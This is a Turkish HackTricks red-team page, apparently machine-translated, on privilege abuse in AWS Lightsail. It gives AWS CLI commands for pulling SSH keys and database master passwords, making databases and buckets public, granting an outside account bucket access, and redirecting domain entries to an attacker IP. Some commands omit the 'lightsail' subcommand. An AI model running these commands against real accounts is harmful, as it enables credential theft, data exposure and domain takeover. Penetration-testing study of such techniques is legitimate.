AWS - Lightsail Privesc

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Lightsail

Lightsail hakkında daha fazla bilgi için:

AWS - Lightsail Enum

Önemli bir not olarak, Lightsail kullanıcıya ait IAM rollerini değil, AWS tarafından yönetilen bir hesaba ait IAM rollerini kullanır, bu yüzden bu hizmeti kullanarak ayrıcalık yükseltme yapamazsınız. Bununla birlikte, bu hizmette kod, API anahtarları ve veritabanı bilgileri gibi hassas veriler bulunabilir.

lightsail:DownloadDefaultKeyPair

Bu izin, örneklerin erişimi için SSH anahtarlarını almanıza olanak sağlar:

aws lightsail download-default-key-pair

Potansiyel Etki: Örnekler içinde hassas bilgiler bulunabilir.

lightsail:GetInstanceAccessDetails

Bu izin, örneklerin erişimi için SSH anahtarları oluşturmanıza izin verecektir:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potansiyel Etki: Örneklerin içinde hassas bilgiler bulunabilir.

lightsail:CreateBucketAccessKey

Bu izin, bir anahtar almanıza izin verecektir. Bu anahtarla kovete erişebilirsiniz:

aws lightsail create-bucket-access-key --bucket-name <name>

Potansiyel Etki: Kova içinde hassas bilgiler bulunabilir.

lightsail:GetRelationalDatabaseMasterUserPassword

Bu izin, veritabanına erişmek için kimlik bilgilerini almanıza olanak sağlar:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potansiyel Etki: Veritabanı içinde hassas bilgiler bulunabilir.

lightsail:UpdateRelationalDatabase

Bu izin, veritabanına erişmek için şifreyi değiştirmenize olanak sağlar:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Veritabanı halka açık değilse, bu izinlerle halka açık hale de getirebilirsiniz:

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potansiyel Etki: Veritabanı içinde hassas bilgiler bulunabilir.

lightsail:OpenInstancePublicPorts

Bu izin, portların İnternet'e açılmasına izin verir.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Potansiyel Etki: Hassas bağlantı noktalarına erişim.

lightsail:PutInstancePublicPorts

Bu izin, bağlantı noktalarını İnternet'e açmanıza olanak sağlar. Not edin ki, bu çağrıda belirtilmeyen herhangi bir açık bağlantı noktası kapatılacaktır.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Potansiyel Etki: Hassas bağlantı noktalarına erişim sağlar.

lightsail:SetResourceAccessForBucket

Bu izin, ek kimlik bilgisi olmadan bir örneğe bir kova erişimi sağlamaya izin verir.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potansiyel Etki: Hassas bilgilere sahip kovalara potansiyel yeni erişim.

lightsail:UpdateBucket

Bu izinle bir saldırgan, kendi AWS hesabına kovalara okuma erişimi sağlayabilir veya kovaları herkese açık hale getirebilir:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potansiyel Etki: Hassas bilgilere sahip kovalara potansiyel yeni erişim.

lightsail:UpdateContainerService

Bu izinlerle bir saldırgan, konteyner hizmetinden özel ECR'lere erişim sağlayabilir.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Potansiyel Etki: Özel ECR'den hassas bilgiler alınabilir.

lightsail:CreateDomainEntry

Bu izne sahip bir saldırgan, alt alan adı oluşturabilir ve bunu kendi IP adresine yönlendirebilir (alt alan adı ele geçirme), veya kendisine ait bir SPF kaydı oluşturabilir ve böylece alan adından sahte e-postalar gönderebilir veya hatta ana alan adı kendi IP adresine yönlendirebilir.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potansiyel Etki: Bir alan adını ele geçirme

lightsail:UpdateDomainEntry

Bu izne sahip bir saldırgan, alt alan adı oluşturabilir ve onu kendi IP adresine yönlendirebilir (alt alan adı ele geçirme), veya kendisine ait bir SPF kaydı oluşturabilir ve alan adından sahte e-postalar göndermesine izin verebilir, hatta ana alan adı için kendi IP adresini ayarlayabilir.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potansiyel Etki: Bir alan adını ele geçirme

AWS hacklemeyi sıfırdan kahraman seviyesine kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Last updated